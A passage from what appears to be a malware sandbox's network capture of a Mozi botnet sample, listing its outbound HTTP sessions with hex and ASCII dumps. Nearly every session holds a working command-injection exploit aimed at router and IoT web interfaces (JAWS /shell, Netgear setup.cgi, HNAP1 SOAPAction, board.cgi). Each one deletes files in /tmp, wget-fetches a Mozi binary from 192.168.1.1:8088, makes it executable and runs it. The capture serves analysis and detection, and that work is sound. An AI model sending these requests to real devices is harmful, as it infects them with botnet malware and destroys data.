64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f
                                                                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        23192.168.2.2051602104.98.58.11580
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:59:54.046506882 CET827OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 104.98.58.115:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
                                                                                                        Jan 6, 2021 14:59:54.195096016 CET828INHTTP/1.0 400 Bad Request
                                                                                                        Server: AkamaiGHost
                                                                                                        Mime-Version: 1.0
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 207
                                                                                                        Expires: Wed, 06 Jan 2021 13:59:54 GMT
                                                                                                        Date: Wed, 06 Jan 2021 13:59:54 GMT
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 66 66 38 36 36 36 38 26 23 34 36 3b 31 36 30 39 39 34 31 35 39 34 26 23 34 36 3b 33 62 37 63 61 37 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ff86668&#46;1609941594&#46;3b7ca71</BODY></HTML>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        24192.168.2.204739415.206.172.13480
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 15:00:04.011616945 CET873OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 15:00:04.168989897 CET873INHTTP/1.1 302 Found
                                                                                                        Date: Wed, 06 Jan 2021 14:00:04 GMT
                                                                                                        Server: Apache
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Location: https://www.vavodigital.com/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                                                                                                        Content-Length: 383
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 61 76 6f 64 69 67 69 74 61 6c 2e 63 6f 6d 2f 73 65 74 75 70 2e 63 67 69 3f 6e 65 78 74 5f 66 69 6c 65 3d 6e 65 74 67 65 61 72 2e 63 66 67 26 61 6d 70 3b 74 6f 64 6f 3d 73 79 73 63 6d 64 26 61 6d 70 3b 63 6d 64 3d 72 6d 2b 2d 72 66 2b 2f 74 6d 70 2f 2a 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2f 74 6d 70 2f 6e 65 74 67 65 61 72 3b 73 68 2b 6e 65 74 67 65 61 72 26 61 6d 70 3b 63 75 72 70 61 74 68 3d 2f 26 61 6d 70 3b 63 75 72 72 65 6e 74 73 65 74 74 69 6e 67 2e 68 74 6d 3d 31 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.vavodigital.com/setup.cgi?next_file=netgear.cfg&amp;todo=syscmd&amp;cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&amp;curpath=/&amp;currentsetting.htm=1">here</a>.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        25192.168.2.206019623.218.46.1680
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 15:00:22.368252039 CET960OUTPOST /HNAP1/ HTTP/1.0
                                                                                                        Host: 23.218.46.16:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                        Jan 6, 2021 15:00:22.660655022 CET962INHTTP/1.0 400 Bad Request
                                                                                                        Server: AkamaiGHost
                                                                                                        Mime-Version: 1.0
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 250
                                                                                                        Expires: Wed, 06 Jan 2021 14:00:22 GMT
                                                                                                        Date: Wed, 06 Jan 2021 14:00:22 GMT
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 48 4e 41 50 31 26 23 34 37 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 37 33 36 64 34 31 37 26 23 34 36 3b 31 36 30 39 39 34 31 36 32 32 26 23 34 36 3b 32 36 37 62 35 30 65 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;HNAP1&#47;", is invalid.<p>Reference&#32;&#35;9&#46;b736d417&#46;1609941622&#46;267b50e0</BODY></HTML>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        26192.168.2.203567043.242.34.2248080
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 15:00:23.789465904 CET971OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                                                        Data Raw:
                                                                                                        Data Ascii:
                                                                                                        Jan 6, 2021 15:00:24.338797092 CET971OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                                                        Data Raw:
                                                                                                        Data Ascii:
                                                                                                        Jan 6, 2021 15:00:25.042809010 CET975OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                                                        Data Raw:
                                                                                                        Data Ascii:
                                                                                                        Jan 6, 2021 15:00:26.454811096 CET977OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                                                        Data Raw:
                                                                                                        Data Ascii:
                                                                                                        Jan 6, 2021 15:00:29.274982929 CET993OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                                                        Data Raw:
                                                                                                        Data Ascii:
                                                                                                        Jan 6, 2021 15:00:34.923228025 CET1019OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                                                        Data Raw:
                                                                                                        Data Ascii:
                                                                                                        Jan 6, 2021 15:00:46.219926119 CET1073OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                                                        Data Raw:
                                                                                                        Data Ascii:
                                                                                                        Jan 6, 2021 15:01:08.812869072 CET1180OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                                                        Data Raw:
                                                                                                        Data Ascii:


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        27192.168.2.206013099.61.64.1778080
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 15:00:34.743587017 CET1018OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 15:00:34.939941883 CET1019INHTTP/1.0 404 Not Found
                                                                                                        Date: Wed, 06 Jan 2021 08:19:15 GMT
                                                                                                        Server: DNVRS-Webs
                                                                                                        Cache-Control: no-cache
                                                                                                        Content-Length: 166
                                                                                                        Content-Type: text/html
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        28192.168.2.2034026206.212.1.19980
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 15:01:02.713958025 CET1150OUTPOST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                        Jan 6, 2021 15:01:03.164597034 CET1152OUTPOST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                        Jan 6, 2021 15:01:03.668601990 CET1159OUTPOST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
